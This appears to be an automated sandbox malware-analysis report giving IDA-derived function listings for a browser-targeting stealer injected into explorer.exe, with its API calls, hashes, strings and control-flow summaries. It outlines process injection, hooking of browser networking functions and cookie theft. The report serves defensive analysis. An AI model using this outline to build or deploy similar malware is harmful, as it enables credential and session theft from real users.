                                                      • GetProcAddress.KERNEL32(00000000), ref: 00083BBC
                                                        • Part of subcall function 00081C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 00081C42
                                                      • RtlExitUserThread.NTDLL(00000000), ref: 00083BD9
                                                      • wsprintfA.USER32 ref: 00083C1F
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00083C69
                                                      • Process32First.KERNEL32(00000000,?), ref: 00083C88
                                                      • CloseHandle.KERNELBASE(00000000), ref: 00083D77
                                                      • Sleep.KERNELBASE(000003E8), ref: 00083D82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                                                      • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                                                      • API String ID: 2480436012-2618538661
                                                      • Opcode ID: b9f6ff7a843870f369ebe3c7313e7c28a896d86895adef5c6821e2817a989fd5
                                                      • Instruction ID: 4080beb071130776e6dd09e7f3c374191be514a04634faf7e68f9b4ce61aff03
                                                      • Opcode Fuzzy Hash: b9f6ff7a843870f369ebe3c7313e7c28a896d86895adef5c6821e2817a989fd5
                                                      • Instruction Fuzzy Hash: AEA1D370A40716A7E71077719C49E6F3A9CBF91B41B120524F6C1AB292EF79C9028FA6
                                                      Function 00083D8D Relevance: 4.5, APIs: 3, Instructions: 46nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 159 83d8d-83d97 call 81274 162 83d99-83dc2 call 81000 RtlMoveMemory 159->162 163 83e03-83e04 159->163 166 83de8-83dfc NtUnmapViewOfSection 162->166 167 83dc4-83de2 call 81000 RtlMoveMemory 162->167 169 83e0a-83e15 call 83be1 166->169 170 83dfe-83dff 166->170 167->166 177 83e20-83e23 169->177 178 83e17-83e1b call 83d8d 169->178 170->163 172 83e01-83e05 call 83862 170->172 172->169 178->177
                                                      APIs
                                                        • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00083DAF
                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00083DE2
                                                      • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00083DEB
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                                                      • String ID:
                                                      • API String ID: 4050682147-0
                                                      • Opcode ID: 0bdd0153c5d571ba371ff687eaf063fdcaa43c021457fa3483b6ad3aa1bdb115
                                                      • Instruction ID: dcd502424e309425fe8eb10f29b26712ba654105e7724c8cb1046160188aa2ce
                                                      • Opcode Fuzzy Hash: 0bdd0153c5d571ba371ff687eaf063fdcaa43c021457fa3483b6ad3aa1bdb115
                                                      • Instruction Fuzzy Hash: 4301D430400601AFDB28BB64EC58BEB3B9CFF85711F118529B5D6871E2CA7B8A41CF65
                                                      Function 00083BE1 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130stringsleepprocessCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 114 83be1-83c3a call 81000 * 2 wsprintfA call 81235 121 83c3c-83c4c call 81141 114->121 122 83c5e 114->122 128 83c4e call 83829 121->128 129 83c53-83c59 call 81261 121->129 124 83c64-83c74 CreateToolhelp32Snapshot 122->124 126 83c7a-83c8e Process32First 124->126 127 83d7d-83d88 Sleep 124->127 130 83d6e-83d70 126->130 127->124 128->129 129->122 133 83c93-83ca5 lstrcmpi 130->133 134 83d76-83d77 CloseHandle 130->134 135 83cda-83ce3 call 812aa 133->135 136 83ca7-83cb5 lstrcmpi 133->136 134->127 142 83d62-83d68 Process32Next 135->142 143 83ce5-83cee call 81305 135->143 136->135 138 83cb7-83cc5 lstrcmpi 136->138 138->135 140 83cc7-83cd4 call 82ea8 138->140 140->135 140->142 142->130 143->142 147 83cf0-83cf7 call 81320 143->147 147->142 150 83cf9-83d06 call 81274 147->150 150->142 153 83d08-83d5d lstrcmpi call 81090 call 81fe5 call 81090 150->153 153->142
                                                      APIs
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • wsprintfA.USER32 ref: 00083C1F
                                                        • Part of subcall function 00081235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0008123F
                                                        • Part of subcall function 00081235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00083C33), ref: 00081251
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00083C69
                                                      • Process32First.KERNEL32(00000000,?), ref: 00083C88
                                                      • lstrcmpi.KERNEL32(?,firefox.exe), ref: 00083CA1
                                                      • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 00083CB1
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00083CC1
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00083D12
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00083D68
                                                      • CloseHandle.KERNELBASE(00000000), ref: 00083D77
                                                      • Sleep.KERNELBASE(000003E8), ref: 00083D82
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                      • String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
                                                      • API String ID: 2509890648-2554907557
                                                      • Opcode ID: 0d0ddd3babe7951f4962b83fe7927ab9f7e6e2b6a7115e594057a30b113bad32
                                                      • Instruction ID: b3decc60f1b6fd0102e2c0e98a0bf13bb15c07833eab530b9c5dae2245e78d24
                                                      • Opcode Fuzzy Hash: 0d0ddd3babe7951f4962b83fe7927ab9f7e6e2b6a7115e594057a30b113bad32
                                                      • Instruction Fuzzy Hash: AF41E6316047029BD614BB74EC45ABF37ADBF94B40F000518B9D297192EF39DE068BA6
                                                      Function 00081235 Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 180 81235-81247 OpenFileMappingA 181 81249-81259 MapViewOfFile 180->181 182 8125c-81260 180->182 181->182
                                                      APIs
                                                      • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0008123F
                                                      • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00083C33), ref: 00081251
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$MappingOpenView
                                                      • String ID:
                                                      • API String ID: 3439327939-0
                                                      • Opcode ID: 2b55954cab2d3ab23cb26bdc3426ab0b4883f1f8e4826569a64c97ab8e8399a0
                                                      • Instruction ID: 31edbaac02ff07a1b824ab005dc06848c6bb7be7fdd6de8e3064e283bb2ae97a
                                                      • Opcode Fuzzy Hash: 2b55954cab2d3ab23cb26bdc3426ab0b4883f1f8e4826569a64c97ab8e8399a0
                                                      • Instruction Fuzzy Hash: 5ED017327052327BE3706ABB6C0CF836EDDEF86AE1B014025B649D2150D6608821C7F0
                                                      Function 00081261 Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 183 81261-81273 UnmapViewOfFile CloseHandle
                                                      APIs
                                                      • UnmapViewOfFile.KERNEL32(00000000,00000000,00083C5E,00000001), ref: 00081265
                                                      • CloseHandle.KERNELBASE(?), ref: 0008126C
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CloseFileHandleUnmapView
                                                      • String ID:
                                                      • API String ID: 2381555830-0
                                                      • Opcode ID: f9525f4a91e8645a93b96e0a949e679c081eab0605ddecb765d952afeb12ae9a
                                                      • Instruction ID: c184eb3bb083f7b6bb603a86e3cff50339feff78dbb80b7db0fead9aac5e1450
                                                      • Opcode Fuzzy Hash: f9525f4a91e8645a93b96e0a949e679c081eab0605ddecb765d952afeb12ae9a
                                                      • Instruction Fuzzy Hash: D3B01237419031D7D31427747C0C8CB3E18FF492213028540F24E82011473C08419FF5
                                                      Function 00081000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 184 81000-81010 GetProcessHeap RtlAllocateHeap
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateProcess
                                                      • String ID:
                                                      • API String ID: 1357844191-0
                                                      • Opcode ID: b94d352eba827c55e13339f87e9f3a43d9d04c7acd40f655af300f4012798e7b
                                                      • Instruction ID: 4deb57588eb96029a35becf2c55eca230ebc00b67c115c5e18b133d903a3b778
                                                      • Opcode Fuzzy Hash: b94d352eba827c55e13339f87e9f3a43d9d04c7acd40f655af300f4012798e7b
                                                      • Instruction Fuzzy Hash: 0EA002B59501115BFE4457E4BD0DB173518B744745F248544738685050A97854148F21

                                                      Non-executed Functions

                                                      Function 00081FE5 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208injectionnativesleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,756F3E2E), ref: 0008201A
                                                      • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00082055
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000820E5
                                                      • RtlMoveMemory.NTDLL(00000000,000850A0,00000016), ref: 0008210C
                                                      • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00082134
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00082144
                                                      • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0008215E
                                                      • GetLastError.KERNEL32 ref: 00082166
                                                      • CloseHandle.KERNEL32(00000000), ref: 00082174
                                                      • Sleep.KERNEL32(000003E8), ref: 0008217B
                                                      • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00082191
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00082198
                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821AE
                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821D8
                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000821EB
                                                      • CloseHandle.KERNEL32(00000000), ref: 000821F2
                                                      • Sleep.KERNEL32(000001F4), ref: 000821F9
                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0008220D
                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00082224
                                                      • CloseHandle.KERNEL32(00000000), ref: 00082231
                                                      • CloseHandle.KERNEL32(?), ref: 00082237
                                                      • CloseHandle.KERNEL32(?), ref: 0008223D
                                                      • CloseHandle.KERNEL32(00000000), ref: 00082240
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                      • String ID: atan$ntdll$opera_shared_counter
                                                      • API String ID: 1066286714-2737717697
                                                      • Opcode ID: cb3eba5e0f163015cfdde3e865c7bed91dec7b23870b9c877b2fb9ccc63931f1
                                                      • Instruction ID: b8529cd7b6f7b3f81938f29da9ae38e819e5d60d405e704a022585a417c3316f
                                                      • Opcode Fuzzy Hash: cb3eba5e0f163015cfdde3e865c7bed91dec7b23870b9c877b2fb9ccc63931f1
                                                      • Instruction Fuzzy Hash: 56616D71508315AFE710AF658C88E6B7BECFB88754F000629BA89D3291D778DD058F66
                                                      Function 000815BE Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87filestringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000815EB
                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 000815F7
                                                      • lstrcmpiW.KERNEL32(?,000841C8), ref: 00081623
                                                      • lstrcmpiW.KERNEL32(?,000841CC), ref: 00081633
                                                      • PathCombineW.SHLWAPI(00000000,?,?), ref: 0008164C
                                                      • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 00081661
                                                      • PathCombineW.SHLWAPI(00000000,?,?), ref: 0008167E
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0008169C
                                                      • FindClose.KERNEL32(00000000), ref: 000816AB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                                                      • String ID: *.*$Cookies*
                                                      • API String ID: 4256701249-3228320225
                                                      • Opcode ID: de4fde3954acede6bbaa2663d65d846f994a8c3001a9ee01889cae48822a856e
                                                      • Instruction ID: 8b79dbc0752a28f5ad1f1006910a533587f018e208c1d15e1b3a33415b5554fa
                                                      • Opcode Fuzzy Hash: de4fde3954acede6bbaa2663d65d846f994a8c3001a9ee01889cae48822a856e
                                                      • Instruction Fuzzy Hash: 832167712043169BD710BB60AC84ABF7BDCBF89795F040529FAC5D3241EB78DD464BA2
                                                      Function 000814D8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 70fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 463 814d8-81527 call 813fe call 81000 wsprintfW FindFirstFileW 468 81599-815a6 call 81011 463->468 469 81529 463->469 471 8152b-81530 469->471 473 8157e-8158c FindNextFileW 471->473 474 81532-8153d call 813d7 471->474 473->471 475 8158e-81595 FindClose 473->475 474->473 478 8153f-81565 call 81000 wsprintfW 474->478 475->468 481 81570-81579 DeleteFileW call 81011 478->481 482 81567-8156a SetFileAttributesW 478->482 481->473 482->481
                                                      APIs
                                                        • Part of subcall function 000813FE: wsprintfW.USER32 ref: 0008142A
                                                        • Part of subcall function 000813FE: FindFirstFileW.KERNEL32(00000000,?), ref: 00081439
                                                        • Part of subcall function 000813FE: wsprintfW.USER32 ref: 00081476
                                                        • Part of subcall function 000813FE: RemoveDirectoryW.KERNEL32(00000000), ref: 0008149C
                                                        • Part of subcall function 000813FE: FindNextFileW.KERNEL32(00000000,00000010), ref: 000814AF
                                                        • Part of subcall function 000813FE: FindClose.KERNEL32(00000000), ref: 000814BA
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • wsprintfW.USER32 ref: 0008150D
                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                      • wsprintfW.USER32 ref: 00081557
                                                      • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                      • DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                      • FindClose.KERNEL32(00000000), ref: 0008158F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                      • String ID: %s%s$*.*
                                                      • API String ID: 2055899612-705776850
                                                      • Opcode ID: 80c984e5e7019e95e716a10583bb4acde58effe50df50ecf44e95ac5e90c50b4
                                                      • Instruction ID: 5bb26f6c1dc7bd09f101a8d25e391cda339d68d8b89c612bbdf1b72f2cef919b
                                                      • Opcode Fuzzy Hash: 80c984e5e7019e95e716a10583bb4acde58effe50df50ecf44e95ac5e90c50b4
                                                      • Instruction Fuzzy Hash: 1F11B7312007055BE310BB649C49AEF7BDCFF95755F000519FED2922D3EB788A4687A6
                                                      Function 000813FE Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 69fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • wsprintfW.USER32 ref: 0008142A
                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00081439
                                                      • wsprintfW.USER32 ref: 00081476
                                                        • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                                        • Part of subcall function 000814D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                        • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                                        • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                        • Part of subcall function 000814D8: DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                        • Part of subcall function 000814D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                        • Part of subcall function 000814D8: FindClose.KERNEL32(00000000), ref: 0008158F
                                                      • RemoveDirectoryW.KERNEL32(00000000), ref: 0008149C
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 000814AF
                                                      • FindClose.KERNEL32(00000000), ref: 000814BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                      • String ID: %s%s$%s%s\$*.*
                                                      • API String ID: 2055899612-4093207852
                                                      • Opcode ID: fc9ea9a760a63c4b6c0563a6d2535c86a417247367b891c16f671a48bc96e344
                                                      • Instruction ID: 7a152c0ea108eeacf04616a90babe5037b3a522f46ac4564a06091ccefb20d83
                                                      • Opcode Fuzzy Hash: fc9ea9a760a63c4b6c0563a6d2535c86a417247367b891c16f671a48bc96e344
                                                      • Instruction Fuzzy Hash: D21190302043416BE710BB25EC49AFF76DCFFD5355F000529FAC192292DB79484A8B62
                                                      Function 0008118D Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000811A9
                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
                                                      • lstrlen.KERNEL32(?,00000000), ref: 000811C9
                                                      • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000811D4
                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
                                                      • wsprintfA.USER32 ref: 00081205
                                                      • CryptDestroyHash.ADVAPI32(?), ref: 0008121E
                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00081228
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                      • String ID: %02X
                                                      • API String ID: 3341110664-436463671
                                                      • Opcode ID: b8a327b00917767bbca748ae488a158710af53418303ed8a59bb428a91e867ef
                                                      • Instruction ID: 298286c9a9371f5bd7e7a063f8446572b34c6f4efce2401be2fb8dd3adceacc5
                                                      • Opcode Fuzzy Hash: b8a327b00917767bbca748ae488a158710af53418303ed8a59bb428a91e867ef
                                                      • Instruction Fuzzy Hash: 62113D71900109BFEB119F95EC88EEFBBBCFB44701F104065F645E2150DB754E559B60
                                                      Function 000816C7 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 000816D9
                                                      • GetCurrentThreadId.KERNEL32 ref: 000816E1
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 000816FF
                                                      • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0008171E
                                                      • SuspendThread.KERNEL32(00000000), ref: 0008172E
                                                      • CloseHandle.KERNEL32(00000000), ref: 0008173D
                                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 0008174D
                                                      • CloseHandle.KERNEL32(00000000), ref: 00081758
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                      • String ID:
                                                      • API String ID: 1467098526-0
                                                      • Opcode ID: afb79f67b1f9fd075387a4cdec190970a8b480f67c71d1882683ab69d3bddf25
                                                      • Instruction ID: 9f8a97b458fd6a1e1d725efe8f807f36da717ca79b52438bb26f371cecc15507
                                                      • Opcode Fuzzy Hash: afb79f67b1f9fd075387a4cdec190970a8b480f67c71d1882683ab69d3bddf25
                                                      • Instruction Fuzzy Hash: 53113C72408212EBE711AF60AC48AAFBFF8FF85711F05041DF6C592150D738894A9FA7
                                                      Function 00082E1B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
                                                      • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00082E7F
                                                      • StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92
                                                        • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                        • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Process$Heap$InformationQuery$AllocateFreeOpen
                                                      • String ID: NetworkService
                                                      • API String ID: 1656241333-2019834739
                                                      • Opcode ID: c3c891bf310ddb1e1df04d13e9dff9e11e08e117764bfefb19d910cea458b283
                                                      • Instruction ID: 2a2cb19856545ee97dced0d83344d7303902199a923c80ef4bb46b56f5b20446
                                                      • Opcode Fuzzy Hash: c3c891bf310ddb1e1df04d13e9dff9e11e08e117764bfefb19d910cea458b283
                                                      • Instruction Fuzzy Hash: EC01D471300346BFE7247B219C49FAB3A9DFFD8392F014029F68AD6142DAB59C808B20
                                                      Function 00081E4C Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 00081E83
                                                      • LoadLibraryA.KERNEL32(?), ref: 00081EAB
                                                      • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00081ED8
                                                      • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081F29
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                      • String ID:
                                                      • API String ID: 3827878703-0
                                                      • Opcode ID: 88a57c618af0bce28b4bd03ce4e1436d8279253e8c428e03aa47962ae06e8f65
                                                      • Instruction ID: 568ebf0d0beaab3ca419b44d6bddffa2e7cdb8569d387974d06ed25d6f468c67
                                                      • Opcode Fuzzy Hash: 88a57c618af0bce28b4bd03ce4e1436d8279253e8c428e03aa47962ae06e8f65
                                                      • Instruction Fuzzy Hash: A4317A72700216ABCB689F29CC84BA6B7ECFF15354B15456CE986CB201D735E846CBA4
                                                      Function 00082EA8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • StrStrIA.SHLWAPI(chrome.exe|opera.exe|msedge.exe,?), ref: 00082EB4
                                                        • Part of subcall function 00082E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27
                                                        • Part of subcall function 00082E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
                                                        • Part of subcall function 00082E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00082E7F
                                                        • Part of subcall function 00082E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92
                                                      Strings
                                                      • chrome.exe|opera.exe|msedge.exe, xrefs: 00082EAB
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
